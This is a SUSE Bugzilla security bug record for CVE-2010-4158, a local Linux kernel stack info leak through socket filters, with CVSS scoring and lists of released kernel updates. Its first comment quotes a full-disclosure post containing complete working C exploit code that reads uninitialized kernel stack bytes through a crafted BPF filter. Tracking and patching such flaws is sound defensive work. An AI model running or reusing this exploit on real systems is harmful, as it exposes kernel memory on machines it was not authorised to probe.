Bugzilla – Bug 652563
VUL-1: CVE-2010-4158: kernel: local info leak via socket filter
Last modified: 2017-03-20 21:26:28 UTC
Hi. There is a security bug in package 'kernel'. This information is from 'full-disclosure'. This bug is public. There is no coordinated release date (CRD) set. More information can be found here: http://marc.info/?l=linux-netdev&m=128934173821229&w=2 Original posting: ---------- Weitergeleitete Nachricht ---------- Betreff: Re: [Full-disclosure] Kernel 0-day Datum: Dienstag 09 November 2010 Von: Dan Rosenberg <dan.j.rosenberg@gmail.com> An: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com http://marc.info/?l=linux-netdev&m=128934173821229&w=2 On Tue, Nov 9, 2010 at 5:18 PM, Dan Rosenberg <dan.j.rosenberg@gmail.com> wrote: > Enjoy... > > -Dan > > > /* > * You've done it. After hours of gdb and caffeine, you've finally got a shell > * on your target's server. Maybe next time they will think twice about > * running MyFirstCompSciProjectFTPD on a production machine. As you take > * another sip of Mountain Dew and pick some of the cheetos out of your beard, > * you begin to plan your next move - it's time to tackle the kernel. > * > * What should be your goal? Privilege escalation? That's impossible, there's > * no such thing as a privilege escalation vulnerability on Linux. Denial of > * service? What are you, some kind of script kiddie? No, the answer is > * obvious. You must read the uninitialized bytes of the kernel stack, since > * these bytes contain all the secrets of the universe and the meaning of life. > * > * How can you accomplish this insidious feat? You immediately discard the > * notion of looking for uninitialized struct members that are copied back to > * userspace, since you clearly need something far more elite. In order to > * prove your superiority, your exploit must be as sophisticated as your taste > * in obscure electronic music. After scanning the kernel source for good > * candidates, you find your target and begin to code... > * > * by Dan Rosenberg > * > * Greets to kees, taviso, jono, spender, hawkes, and bla > * > */ > > #include <string.h> > #include <stdio.h> > #include <netinet/in.h> > #include <sys/socket.h> > #include <unistd.h> > #include <stdlib.h> > #include <linux/filter.h> > > #define PORT 37337 > > int transfer(int sendsock, int recvsock) > { > > struct sockaddr_in addr; > char buf[512]; > int len = sizeof(addr); > > memset(buf, 0, sizeof(buf)); > > if (fork()) > return recvfrom(recvsock, buf, 512, 0, (struct sockaddr *)&addr, &len); > > sleep(1); > > memset(&addr, 0, sizeof(addr)); > addr.sin_family = AF_INET; > addr.sin_port = htons(PORT); > addr.sin_addr.s_addr = inet_addr("127.0.0.1"); > > sendto(sendsock, buf, 512, 0, (struct sockaddr *)&addr, len); > > exit(0); > > } > > int main(int argc, char * argv[]) > { > > int sendsock, recvsock, ret; > unsigned int val; > struct sockaddr_in addr; > struct sock_fprog fprog; > struct sock_filter filters[5]; > > if (argc != 2) { > printf("[*] Usage: %s offset (0-63)\n", argv[0]); > return -1; > } > > val = atoi(argv[1]); > > if (val > 63) { > printf("[*] Invalid byte offset (must be 0-63)\n"); > return -1; > } > > recvsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); > sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); > > if (recvsock < 0 || sendsock < 0) { > printf("[*] Could not create sockets.\n"); > return -1; > } > > memset(&addr, 0, sizeof(addr)); > addr.sin_family = AF_INET; > addr.sin_port = htons(PORT); > addr.sin_addr.s_addr = htonl(INADDR_ANY); > > if (bind(recvsock, (struct sockaddr *)&addr, sizeof(addr)) < 0) { > printf("[*] Could not bind socket.\n"); > return -1; > } > > memset(&fprog, 0, sizeof(fprog)); > memset(filters, 0, sizeof(filters)); > > filters[0].code = BPF_LD|BPF_MEM; > filters[0].k = (val & ~0x3) / 4; > > filters[1].code = BPF_ALU|BPF_AND|BPF_K; > filters[1].k = 0xff << ((val % 4) * 8); > > filters[2].code = BPF_ALU|BPF_RSH|BPF_K; > filters[2].k = (val % 4) * 8; > > filters[3].code = BPF_ALU|BPF_ADD|BPF_K; > filters[3].k = 256; > > filters[4].code = BPF_RET|BPF_A; > > fprog.len = 5; > fprog.filter = filters; > > if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)) < 0) { > printf("[*] Failed to install filter.\n"); > return -1; > } > > ret = transfer(sendsock, recvsock); > > printf("[*] Your byte: 0x%.02x\n", ret - 248); > > } > > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ------------------------------------------------------------- -- Thomas Biege <thomas@suse.de>, SUSE LINUX, Security Support & Auditing SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg) -- Wer aufhoert besser werden zu wollen, hoert auf gut zu sein. -- Marie von Ebner-Eschenbach
CVE-2010-4158
CVE-2010-4158: CVSS v2 Base Score: 2.1 (low) (AV:L/AC:L/Au:N/C:P/I:N/A:N)
Applied to SLES9 SP4 SLES10 SP3 and SP4 SLE11 openSUSE 11.2 SLE11 SP1 openSUSE 11.3 openSUSE Factory is unaffected. Meego/Moblin and SLERT may be affected.
pplied to SLE11-SP1-RT and SLERT10_SP3
Update released for: kernel-debug, kernel-debug-base, kernel-debug-debuginfo, kernel-debug-debugsource, kernel-debug-extra, kernel-default, kernel-default-base, kernel-default-debuginfo, kernel-default-debugsource, kernel-default-extra, kernel-docs, kernel-kdump, kernel-kdump-debuginfo, kernel-kdump-debugsource, kernel-pae, kernel-pae-base, kernel-pae-debuginfo, kernel-pae-debugsource, kernel-pae-extra, kernel-ppc64, kernel-ppc64-base, kernel-ppc64-debuginfo, kernel-ppc64-debugsource, kernel-ppc64-extra, kernel-ps3, kernel-ps3-debuginfo, kernel-ps3-debugsource, kernel-source, kernel-source-debuginfo, kernel-syms, kernel-trace, kernel-trace-base, kernel-trace-debuginfo, kernel-trace-debugsource, kernel-trace-extra, kernel-vanilla, kernel-vanilla-debuginfo, kernel-vanilla-debugsource, kernel-xen, kernel-xen-base, kernel-xen-debuginfo, kernel-xen-debugsource, kernel-xen-extra Products: openSUSE 11.1 (debug, i586, ppc, x86_64)
We just released a kernel update for SUSE Linux Enterprise 10 Service Pack 3, which fixes/mentions this bugreport. Released kernel version is 2.6.16.60-0.74.7.
Update released for: kernel-bigsmp, kernel-bigsmp-debuginfo, kernel-debug, kernel-debug-debuginfo, kernel-default, kernel-default-debuginfo, kernel-kdump, kernel-kdump-debuginfo, kernel-kdumppae, kernel-kdumppae-debuginfo, kernel-smp, kernel-smp-debuginfo, kernel-source, kernel-source-debuginfo, kernel-syms, kernel-syms-debuginfo, kernel-vmi, kernel-vmi-debuginfo, kernel-vmipae, kernel-vmipae-debuginfo, kernel-xen, kernel-xen-debuginfo, kernel-xenpae, kernel-xenpae-debuginfo Products: SLE-DEBUGINFO 10-SP3 (i386) SLE-DESKTOP 10-SP3 (i386) SLE-SDK 10-SP3 (i386) SLE-SERVER 10-SP3 (i386)
Update released for: kernel-debug, kernel-debug-debuginfo, kernel-default, kernel-default-debuginfo, kernel-source, kernel-source-debuginfo, kernel-syms Products: SLE-DEBUGINFO 10-SP3 (ia64) SLE-SDK 10-SP3 (ia64) SLE-SERVER 10-SP3 (ia64)
Update released for: kernel-default, kernel-default-debuginfo, kernel-source, kernel-syms Products: SLE-DEBUGINFO 10-SP3 (s390x) SLE-SERVER 10-SP3 (s390x)
Update released for: kernel-default, kernel-default-debuginfo, kernel-iseries64, kernel-iseries64-debuginfo, kernel-kdump, kernel-kdump-debuginfo, kernel-ppc64, kernel-ppc64-debuginfo, kernel-source, kernel-source-debuginfo, kernel-syms Products: SLE-DEBUGINFO 10-SP3 (ppc) SLE-SDK 10-SP3 (ppc) SLE-SERVER 10-SP3 (ppc)
Update released for: kernel-debug, kernel-debug-debuginfo, kernel-default, kernel-default-debuginfo, kernel-kdump, kernel-kdump-debuginfo, kernel-smp, kernel-smp-debuginfo, kernel-source, kernel-source-debuginfo, kernel-syms, kernel-xen, kernel-xen-debuginfo Products: SLE-DEBUGINFO 10-SP3 (x86_64) SLE-DESKTOP 10-SP3 (x86_64) SLE-SAP-APL 10-SP3 (x86_64) SLE-SDK 10-SP3 (x86_64) SLE-SERVER 10-SP3 (x86_64)
Update released for: kernel-debug, kernel-debug-base, kernel-debug-base-debuginfo, kernel-debug-debuginfo, kernel-debug-debugsource, kernel-debug-devel, kernel-debug-devel-debuginfo, kernel-default, kernel-default-base, kernel-default-base-debuginfo, kernel-default-debuginfo, kernel-default-debugsource, kernel-default-devel, kernel-default-devel-debuginfo, kernel-desktop, kernel-desktop-base, kernel-desktop-base-debuginfo, kernel-desktop-debuginfo, kernel-desktop-debugsource, kernel-desktop-devel, kernel-desktop-devel-debuginfo, kernel-pae, kernel-pae-base, kernel-pae-base-debuginfo, kernel-pae-debuginfo, kernel-pae-debugsource, kernel-pae-devel, kernel-pae-devel-debuginfo, kernel-source, kernel-source-vanilla, kernel-syms, kernel-trace, kernel-trace-base, kernel-trace-base-debuginfo, kernel-trace-debuginfo, kernel-trace-debugsource, kernel-trace-devel, kernel-trace-devel-debuginfo, kernel-vanilla, kernel-vanilla-base, kernel-vanilla-base-debuginfo, kernel-vanilla-debuginfo, kernel-vanilla-debugsource, kernel-vanilla-devel, kernel-vanilla-devel-debuginfo, kernel-xen, kernel-xen-base, kernel-xen-base-debuginfo, kernel-xen-debuginfo, kernel-xen-debugsource, kernel-xen-devel, kernel-xen-devel-debuginfo, preload-kmp-default, preload-kmp-desktop Products: openSUSE 11.2 (debug, i586, x86_64)
Update released for: kernel-debug, kernel-debug-base, kernel-debug-base-debuginfo, kernel-debug-debuginfo, kernel-debug-debugsource, kernel-debug-devel, kernel-debug-devel-debuginfo, kernel-default, kernel-default-base, kernel-default-base-debuginfo, kernel-default-debuginfo, kernel-default-debugsource, kernel-default-devel, kernel-default-devel-debuginfo, kernel-desktop, kernel-desktop-base, kernel-desktop-base-debuginfo, kernel-desktop-debuginfo, kernel-desktop-debugsource, kernel-desktop-devel, kernel-desktop-devel-debuginfo, kernel-devel, kernel-ec2, kernel-ec2-base, kernel-ec2-base-debuginfo, kernel-ec2-debuginfo, kernel-ec2-debugsource, kernel-ec2-devel, kernel-ec2-devel-debuginfo, kernel-ec2-extra, kernel-ec2-extra-debuginfo, kernel-pae, kernel-pae-base, kernel-pae-base-debuginfo, kernel-pae-debuginfo, kernel-pae-debugsource, kernel-pae-devel, kernel-pae-devel-debuginfo, kernel-source, kernel-source-vanilla, kernel-syms, kernel-trace, kernel-trace-base, kernel-trace-base-debuginfo, kernel-trace-debuginfo, kernel-trace-debugsource, kernel-trace-devel, kernel-trace-devel-debuginfo, kernel-vanilla, kernel-vanilla-base, kernel-vanilla-base-debuginfo, kernel-vanilla-debuginfo, kernel-vanilla-debugsource, kernel-vanilla-devel, kernel-vanilla-devel-debuginfo, kernel-vmi, kernel-vmi-base, kernel-vmi-base-debuginfo, kernel-vmi-debuginfo, kernel-vmi-debugsource, kernel-vmi-devel, kernel-vmi-devel-debuginfo, kernel-xen, kernel-xen-base, kernel-xen-base-debuginfo, kernel-xen-debuginfo, kernel-xen-debugsource, kernel-xen-devel, kernel-xen-devel-debuginfo, preload-kmp-default, preload-kmp-desktop Products: openSUSE 11.3 (debug, i586, x86_64)
A kernel update for SUSE Linux Enterprise 11 SP1 has just been released that mentions/fixes this bug. The released kernel version is 2.6.32.27-0.2.2.
Update released for: btrfs-kmp-default, btrfs-kmp-pae, btrfs-kmp-xen, cluster-network-kmp-default, cluster-network-kmp-pae, cluster-network-kmp-xen, ext4dev-kmp-default, ext4dev-kmp-pae, ext4dev-kmp-xen, gfs2-kmp-default, gfs2-kmp-pae, gfs2-kmp-xen, hyper-v-kmp-default, hyper-v-kmp-pae, kernel-default, kernel-default-base, kernel-default-debuginfo, kernel-default-debugsource, kernel-default-devel, kernel-default-extra, kernel-desktop-devel, kernel-ec2, kernel-ec2-base, kernel-ec2-devel, kernel-ec2-extra, kernel-pae, kernel-pae-base, kernel-pae-debuginfo, kernel-pae-debugsource, kernel-pae-devel, kernel-pae-extra, kernel-source, kernel-source-debuginfo, kernel-source-vanilla, kernel-syms, kernel-trace, kernel-trace-base, kernel-trace-devel, kernel-trace-extra, kernel-xen, kernel-xen-base, kernel-xen-debuginfo, kernel-xen-debugsource, kernel-xen-devel, kernel-xen-extra Products: SLE-DEBUGINFO 11-SP1 (i386) SLE-DESKTOP 11-SP1 (i386) SLE-HAE 11-SP1 (i386) SLE-SERVER 11-SP1 (i386) SLES4VMWARE 11-SP1 (i386)
Update released for: btrfs-kmp-default, btrfs-kmp-xen, cluster-network-kmp-default, cluster-network-kmp-xen, ext4dev-kmp-default, ext4dev-kmp-xen, gfs2-kmp-default, gfs2-kmp-xen, hyper-v-kmp-default, kernel-default, kernel-default-base, kernel-default-debuginfo, kernel-default-debugsource, kernel-default-devel, kernel-default-devel-debuginfo, kernel-default-extra, kernel-desktop-devel, kernel-source, kernel-source-debuginfo, kernel-source-vanilla, kernel-syms, kernel-trace, kernel-trace-base, kernel-trace-debuginfo, kernel-trace-debugsource, kernel-trace-devel, kernel-trace-devel-debuginfo, kernel-trace-extra, kernel-xen, kernel-xen-base, kernel-xen-debuginfo, kernel-xen-debugsource, kernel-xen-devel, kernel-xen-devel-debuginfo, kernel-xen-extra Products: SLE-DEBUGINFO 11-SP1 (x86_64) SLE-DESKTOP 11-SP1 (x86_64) SLE-HAE 11-SP1 (x86_64) SLE-SERVER 11-SP1 (x86_64) SLES4VMWARE 11-SP1 (x86_64)
Update released for: btrfs-kmp-default, btrfs-kmp-ppc64, cluster-network-kmp-default, cluster-network-kmp-ppc64, ext4dev-kmp-default, ext4dev-kmp-ppc64, gfs2-kmp-default, gfs2-kmp-ppc64, kernel-default, kernel-default-base, kernel-default-debuginfo, kernel-default-debugsource, kernel-default-devel, kernel-default-extra, kernel-ppc64, kernel-ppc64-base, kernel-ppc64-debuginfo, kernel-ppc64-debugsource, kernel-ppc64-devel, kernel-ppc64-extra, kernel-source, kernel-source-debuginfo, kernel-source-vanilla, kernel-syms, kernel-trace, kernel-trace-base, kernel-trace-debuginfo, kernel-trace-debugsource, kernel-trace-devel, kernel-trace-extra Products: SLE-DEBUGINFO 11-SP1 (ppc64) SLE-HAE 11-SP1 (ppc64) SLE-SERVER 11-SP1 (ppc64)
Update released for: btrfs-kmp-default, cluster-network-kmp-default, ext4dev-kmp-default, gfs2-kmp-default, kernel-default, kernel-default-base, kernel-default-debuginfo, kernel-default-debugsource, kernel-default-devel, kernel-default-devel-debuginfo, kernel-default-extra, kernel-ec2, kernel-ec2-base, kernel-source, kernel-source-debuginfo, kernel-source-vanilla, kernel-syms, kernel-trace, kernel-trace-base, kernel-trace-debuginfo, kernel-trace-debugsource, kernel-trace-devel, kernel-trace-devel-debuginfo, kernel-trace-extra Products: SLE-DEBUGINFO 11-SP1 (ia64) SLE-HAE 11-SP1 (ia64) SLE-SERVER 11-SP1 (ia64)
Update released for: btrfs-kmp-default, cluster-network-kmp-default, ext4dev-kmp-default, gfs2-kmp-default, kernel-default, kernel-default-base, kernel-default-debuginfo, kernel-default-debugsource, kernel-default-devel, kernel-default-devel-debuginfo, kernel-default-extra, kernel-default-man, kernel-source, kernel-source-debuginfo, kernel-source-vanilla, kernel-syms, kernel-trace, kernel-trace-base, kernel-trace-debuginfo, kernel-trace-debugsource, kernel-trace-devel, kernel-trace-devel-debuginfo, kernel-trace-extra, kernel-trace-man Products: SLE-DEBUGINFO 11-SP1 (s390x) SLE-HAE 11-SP1 (s390x) SLE-SERVER 11-SP1 (s390x)
Update released for: kernel-default-extra Products: SLE-SERVER 11-EXTRA (s390x)
Update released for: kernel-default-extra, kernel-pae-extra, kernel-xen-extra Products: SLE-SERVER 11-EXTRA (i386)
Update released for: kernel-default-extra Products: SLE-SERVER 11-EXTRA (ia64)
Update released for: kernel-default-extra, kernel-ppc64-extra Products: SLE-SERVER 11-EXTRA (ppc64)
Update released for: kernel-default-extra, kernel-xen-extra Products: SLE-SERVER 11-EXTRA (x86_64)
A SLES 9 kernel update mentioning/fixing this bug was just released. The released kernel version is 2.6.5-7.325. closing then
Update released for: kernel-s390x, kernel-s390x-debug, kernel-source, kernel-syms, um-host-kernel, kernel-update.ycp, install-kernel-non-interactive.sh Products: SUSE-CORE 9 (s390x)
Update released for: kernel-bigsmp, kernel-bigsmp-debug, kernel-debug, kernel-debug-debug, kernel-default, kernel-default-debug, kernel-smp, kernel-smp-debug, kernel-source, kernel-syms, kernel-um, kernel-um-debug, kernel-xen, kernel-xen-debug, kernel-xenpae, kernel-xenpae-debug, um-host-install-initrd, um-host-kernel, xen-kmp Products: Open-Enterprise-Server 9 (i386)
Update released for: kernel-default, kernel-default-debug, kernel-iseries64, kernel-iseries64-debug, kernel-pmac64, kernel-pmac64-debug, kernel-pseries64, kernel-pseries64-debug, kernel-smp, kernel-smp-debug, kernel-source, kernel-syms, um-host-kernel, kernel-update.ycp, install-kernel-non-interactive.sh Products: SUSE-CORE 9 (ppc)
Update released for: kernel-64k-pagesize, kernel-64k-pagesize-debug, kernel-debug, kernel-debug-debug, kernel-default, kernel-default-debug, kernel-sn2, kernel-sn2-debug, kernel-source, kernel-syms, um-host-kernel, kernel-update.ycp, install-kernel-non-interactive.sh Products: SUSE-CORE 9 (ia64)
Update released for: kernel-default, kernel-default-debug, kernel-smp, kernel-smp-debug, kernel-source, kernel-syms, kernel-xen, kernel-xen-debug, um-host-kernel, xen-kmp, kernel-update.ycp, install-kernel-non-interactive.sh Products: SUSE-CORE 9 (x86_64)
Update released for: kernel-bigsmp, kernel-bigsmp-debug, kernel-debug, kernel-debug-debug, kernel-default, kernel-default-debug, kernel-smp, kernel-smp-debug, kernel-source, kernel-syms, kernel-um, kernel-um-debug, kernel-xen, kernel-xen-debug, kernel-xenpae, kernel-xenpae-debug, um-host-install-initrd, um-host-kernel, xen-kmp, kernel-update.ycp, install-kernel-non-interactive.sh Products: Novell-Linux-POS 9 (i386) SUSE-CORE 9 (i386)
Update released for: kernel-s390, kernel-s390-debug, kernel-source, kernel-syms, um-host-kernel, kernel-update.ycp, install-kernel-non-interactive.sh Products: SUSE-CORE 9 (s390)
Update released for: ib-bonding-kmp-debug, ib-bonding-kmp-rt, ib-bonding-kmp-rt_bigsmp, ib-bonding-kmp-rt_bigsmp_shield, ib-bonding-kmp-rt_bigsmp_shield_trace, ib-bonding-kmp-rt_debug, ib-bonding-kmp-rt_shield, ib-bonding-kmp-rt_shield_trace, ib-bonding-kmp-rt_timing, intel-igb, intel-igb-kmp-rt, intel-igb-kmp-rt_bigsmp, intel-igb-kmp-rt_debug, intel-igb-kmp-rt_timing, kernel-rt, kernel-rt_bigsmp, kernel-rt_debug, kernel-rt_timing, kernel-source, kernel-syms, ofed, ofed-cxgb3-NIC-kmp-rt, ofed-cxgb3-NIC-kmp-rt_bigsmp, ofed-cxgb3-NIC-kmp-rt_debug, ofed-cxgb3-NIC-kmp-rt_timing, ofed-devel, ofed-doc, ofed-kmp-rt, ofed-kmp-rt_bigsmp, ofed-kmp-rt_bigsmp_shield, ofed-kmp-rt_bigsmp_shield_trace, ofed-kmp-rt_debug, ofed-kmp-rt_shield, ofed-kmp-rt_shield_trace, ofed-kmp-rt_timing Products: SLE-RT 10-SP3 (i386, x86_64)
openSUSE-SU-2013:0927-1: An update that solves 75 vulnerabilities and has 1406 fixes is now available. Category: security (low) Bug References: 176921,225091,299267,436025,439348,445872,458027,467688,468397,470671,476525,486001,501563,503038,527028,550447,550906,552250,556135,556234,556572,556959,557479,557710,560420,560454,561811,562046,562095,563905,564618,564635,564638,564640,565027,565124,565845,566332,566768,567283,567376,567474,567703,568147,568848,569050,569194,569238,569606,569687,569916,570284,570320,570492,570526,572119,572294,572661,572834,573237,573330,573401,573565,573722,573803,574006,574771,575047,575072,575073,575074,575181,575194,575199,575396,575409,575752,575884,575923,575956,576277,577203,577232,577355,577358,577529,577753,577771,577856,577937,577967,578046,578059,578429,578430,578572,578639,578927,578980,578981,579060,579111,579137,579439,579636,579639,579647,579682,580105,580140,580373,580381,580416,580793,580799,580823,580991,581057,581103,581188,581199,581567,581718,581940,582552,582643,582730,582872,582878,583022,583296,583356,583539,583677,583900,584197,584209,584218,584320,584343,584451,584453,584475,584508,584574,584617,584691,584728,584820,584875,584958,585034,585124,585179,585191,585241,585269,58529,585296,585385,585463,585490,585492,585608,585711,585743,586343,586364,586417,586684,586806,587073,587114,587125,587199,587427,587562,587669,587673,587681,587692,587739,587746,587782,588008,588929,588972,588994,589280,589449,589650,589651,589652,589654,589655,589656,589657,589660,589679,589804,589906,590154,590217,590401,590415,590585,590687,590705,590727,590856,590859,590926,590927,590937,590980,590995,590996,591039,591293,591318,591376,591377,591401,591473,591513,591556,591870,591950,592176,592472,592703,592943,593318,593319,593731,593934,594066,594131,594271,594305,594367,594391,594399,594473,594583,594586,594835,594997,595074,595215,595609,595755,595960,596031,596113,596460,596462,596646,596720,596783,596943,597120,597135,597583,597648,597650,598246,598253,598270,598308,598493,598553,598677,598837,599279,599671,599814,599955,600043,600256,600261,600364,600375,600516,600535,600579,600983,601168,601198,602150,602208,602232,602514,602838,602852,602969,602980,603148,603205,603387,603411,603464,603510,603528,603738,604183,605001,605321,605686,605947,606575,606743,606778,606797,606977,607123,607339,607448,607628,607890,608435,608478,609172,609196,609281,609506,610783,611094,611104,611760,612009,612407,612729,613171,613330,613542,613906,614226,614332,614349,614793,615003,615557,615630,616080,616088,616369,616464,616612,617248,617437,617464,618059,618072,618379,618424,618444,618767,619002,619007,619525,619536,619840,620020,620021,620443,620654,620904,620929,621203,621598,621715,622597,622635,622727,622868,623307,624020,624072,624340,624436,624814,624850,625167,625666,625674,626321,626880,627060,627386,627518,628180,628554,628604,629170,629263,629552,630068,630121,630132,630970,631075,631801,632317,632568,632974,632975,633026,633268,633543,633581,633585,633593,633733,634637,635425,635515,636435,636461,636561,636672,636850,637436,637502,637542,637639,637944,638258,638274,638277,638400,638613,638618,638807,638860,639161,639197,639728,639803,639944,640276,640278,640850,640878,641247,642009,642309,642313,642314,642449,642486,643173,643249,643266,643477,643513,643909,643914,643922,644219,644350,644373,644630,645659,645893,646045,646226,646542,646702,647392,647497,647567,647775,648112,648308,648647,648701,648916,649000,649187,649231,649257,649355,649473,649548,649820,650067,650109,650111,650113,650116,650185,650309,650366,650487,650545,650748,650897,651152,651218,651596,651599,651626,652024,652293,652391,652563,652603,652842,652939,652940,652945,653148,653258,653266,653800,653850,653930,654150,654169,654350,654501,654530,654581,654701,654837,654967,655027,655220,655278,655434,655964,655973,656219,656471,656587,657248,657324,657350,657412,657415,657763,658037,658254,658337,658353,658413,658461,658464,658551,658829,659101,659144,659394,659419,660507,660546,661605,662031,662202,662212,662335,662340,662360,662432,662673,662722,662800,662931,663313,663513,663537,663582,663678,663706,664149,664463,665480,665499,665524,665663,666012,666836,666842,666893,667226,667766,668483,668545,668633,668872,668895,668896,668898,668927,669058,669571,669740,670129,670154,670465,670615,670816,670864,670868,670979,671256,671274,671296,671479,671483,671943,672292,672453,672492,672923,673516,674189,674549,675115,675127,675963,676419,676890,677286,677391,677398,677563,677783,678531,678728,679301,679812,680809,680814,680845,681242,682076,682251,682319,682333,682482,682755,682940,682941,683107,683282,683569,684085,684297,684472,684852,684927,685226,685276,686325,686404,686702,686813,686921,686980,687046,687049,687065,687068,687478,687759,687760,687789,688326,688912,688996,689227,689230,689290,689435,689436,689596,689746,690073,690082,690611,690683,691216,691269,691408,691536,691538,691632,691633,691693,691714,691742,691829,691979,692343,692454,692459,692460,692709,693149,693513,693636,694963,694966,695066,695067,695243,695605,695898,696107,696586,697255,697777,697783,697913,697942,697944,698050,698053,698102,698269,698272,698524,698540,698548,698572,698604,698774,698776,698779,698793,698797,698801,698803,698949,699085,699087,699089,699092,699265,699354,699495,699534,699687,699701,699703,699842,699916,699946,699950,699990,700009,700080,700084,7000995,700332,700391,700401,700445,700448,700512,700514,700632,700637,700638,700777,700856,701163,701170,701183,701198,701622,701686,701977,702133,702384,702470,702604,702651,702736,702832,702838,703013,703100,703156,703204,703422,703426,703653,703786,704163,704280,704361,704592,704917,704957,705433,705472,705487,705551,705906,705962,706131,706410,706472,706473,706485,706557,706587,706696,706821,706838,706841,706882,706913,707094,707270,707389,707666,707988,708160,708204,708269,708274,708296,708376,708635,708636,708720,708730,708809,708836,709063,709064,709068,709075,709266,709269,709300,709332,709467,709528,709866,709974,710352,710790,710868,710969,711201,711285,711297,711378,711519,711566,711592,711684,711765,712404,712405,712420,712899,713134,713148,713448,713490,713675,713707,714096,714106,714215,714274,714552,714604,714605,714643,714786,714789,714911,715031,715496,715635,716023,716708,716850,716970,716971,717142,717160,717248,717263,717372,717500,717573,717574,717797,717840,717848,717884,717996,718149,718160,718165,718265,718279,718366,718401,718518,718521,718551,718831,718863,718910,718918,718936,718950,719029,719079,719090,719280,719296,719408,719592,719645,719693,719846,719911,719943,720075,720353,720451,720456,720457,720458,720459,720460,720536,720661,720674,720741,720750,720753,720946,720960,720996,721007,721042,721045,721206,721212,721239,721246,721337,721410,721464,721517,721587,721738,721840,721857,721874,722092,722260,722265,722414,722433,722437,722449,722560,722569,722635,722640,722646,722793,722795,722993,723008,723171,723597,723884,724014,724133,724227,724544,724577,724616,724620,724734,724800,724865,724906,725077,725208,725344,725346,725350,725355,725424,725592,725594,725709,725836,725878,726023,726075,726156,726176,726214,726309,726333,726400,726504,726699,726703,726710,726850,726999,727250,727324,727367,727415,727453,727493,727611,727638,727650,727793,727814,728035,728043,728086,728195,728329,728597,728626,729122,729466,729518,729548,7297470,729789,729840,729854,730103,730117,730265,730440,730660,730731,730749,731009,731029,731035,731261,731387,73149,731701,731739,731770,731809,731945,731999,732070,732082,732132,732178,732296,732335,732371,732471,732535,732582,733236,733248,733270,733390,733435,733543,733702,733761,733822,733863,734213,734522,734526,734771,734900,735216,735277,735369,735417,735543,735765,735800,735909,736018,736079,736182,736255,736257,736669,736743,736896,737328,737574,737833,737969,738056,738117,738210,738284,738400,738421,738528,738567,738583,738597,738679,738742,739020,739111,739356,739381,739728,739837,739856,740180,740281,740291,740347,740780,740866,740898,740969,740997,741117,741191,741478,741814,741824,741863,742181,742210,742279,742353,742570,742845,742871,743212,743232,743518,743579,743735,743978,744198,744206,744253,744314,744315,744392,744400,744404,744652,744655,744692,744758,744795,744963,745088,745400,745422,745424,745741,745867,745876,745929,746373,746454,746509,746526,746579,746717,746938,747071,747159,747404,747867,747878,747944,748112,748384,748456,748463,748629,748632,748806,748827,748854,748862,748896,749049,749115,749417,749543,749651,749787,749980,750041,750173,750402,750426,750459,750995,751015,751171,751322,751550,751743,751885,751903,751916,752022,752067,752352,752408,752484,752544,752599,752634,752972,753172,753353,753617,753698,754052,754085,754391,754428,754670,754690,754898,754969,755178,755537,755620,755758,755812,756050,756236,756276,756585,756821,756940,757059,757077,757202,757205,757289,757315,757373,757517,757565,757719,757783,757789,757950,758104,758279,758532,758540,758703,758731,758833,759336,759340,759539,759541,759657,759805,759908,759971,760015,760237,760279,760346,760806,760833,760974,761087,761158,761245,761387,761772,761774,761775,762099,762158,762214,762259,762285,762329,762366,762414,762424,762693,762991,762992,763026,763198,763267,763307,763463,763485,763628,763654,763717,763754,763858,763954,763968,764091,764150,764209,764339,764500,764717,764900,765253,765524,766027,766445,766654,766733,767281,767469,767610,767684,767983,768052,768084,768470,768504,768632,769035,769195,769251,769407,769685,770034,770238,770269,770695,770763,771102,771242,771361,771398,771428,771706,771778,772407,772420,772427,772454,772473,772483,772566,772786,772831,772893,773006,773007,773251,773267,773319,773320,773383,773406,773487,773606,773688,773699,773831,773878,774073,774289,774500,774523,774612,774859,774902,774964,774973,775182,775373,775394,775685,775984,776019,776044,776081,776095,776127,776144,776787,776896,777024,777269,777283,778082,778136,778334,778630,778822,779294,779330,779461,779462,779577,779699,779750,779969,780008,780012,780216,780461,780876,781018,781327,781484,781574,782369,782721,783965,784192,784334,784576,785100,785496,785554,785851,786976,787168,787202,787348,787821,787848,788277,788452,789010,789115,789235,789648,789703,789836,789993,790457,790498,790920,790935,791498,791853,791904,792270,792500,792656,792834,793104,793139,793593,793671,794231,794824,795354,797042,798960,799209,799275,799909,803056,804154 CVE References: CVE-2009-4537,CVE-2010-0415,CVE-2010-0622,CVE-2010-0623,CVE-2010-1173,CVE-2010-1437,CVE-2010-2798,CVE-2010-2803,CVE-2010-2943,CVE-2010-2946,CVE-2010-2959,CVE-2010-2960,CVE-2010-2962,CVE-2010-2963,CVE-2010-3015,CVE-2010-3078,CVE-2010-3079,CVE-2010-3080,CVE-2010-3084,CVE-2010-3437,CVE-2010-3699,CVE-2010-3705,CVE-2010-3861,CVE-2010-3874,CVE-2010-3875,CVE-2010-3876,CVE-2010-3877,CVE-2010-3880,CVE-2010-3881,CVE-2010-4072,CVE-2010-4073,CVE-2010-4075,CVE-2010-4076,CVE-2010-4077,CVE-2010-4082,CVE-2010-4083,CVE-2010-4157,CVE-2010-4158,CVE-2010-4160,CVE-2010-4162,CVE-2010-4163,CVE-2010-4165,CVE-2010-4169,CVE-2010-4175,CVE-2010-4243,CVE-2010-4251,CVE-2010-4258,CVE-2010-4342,CVE-2010-4529,CVE-2010-4656,CVE-2010-4668,CVE-2011-0521,CVE-2011-0710,CVE-2011-1573,CVE-2011-1593,CVE-2011-2479,CVE-2011-2494,CVE-2011-4097,CVE-2011-4127,CVE-2011-4131,CVE-2011-4622,CVE-2012-0045,CVE-2012-0056,CVE-2012-1179,CVE-2012-1601,CVE-2012-2133,CVE-2012-2372,CVE-2012-2373,CVE-2012-2390,CVE-2012-2745,CVE-2012-3412,CVE-2012-3430,CVE-2012-4461,CVE-2012-5517,CVE-2013-0871 Sources used: openSUSE 11.4 (src): drbd-8.3.11-10.1, iscsitarget-1.4.19-14.3, kernel-docs-3.0.58-30.3, kernel-source-3.0.58-30.1, kernel-syms-3.0.58-30.1, ndiswrapper-1.57rc1-16.2, omnibook-20100406-9.2, 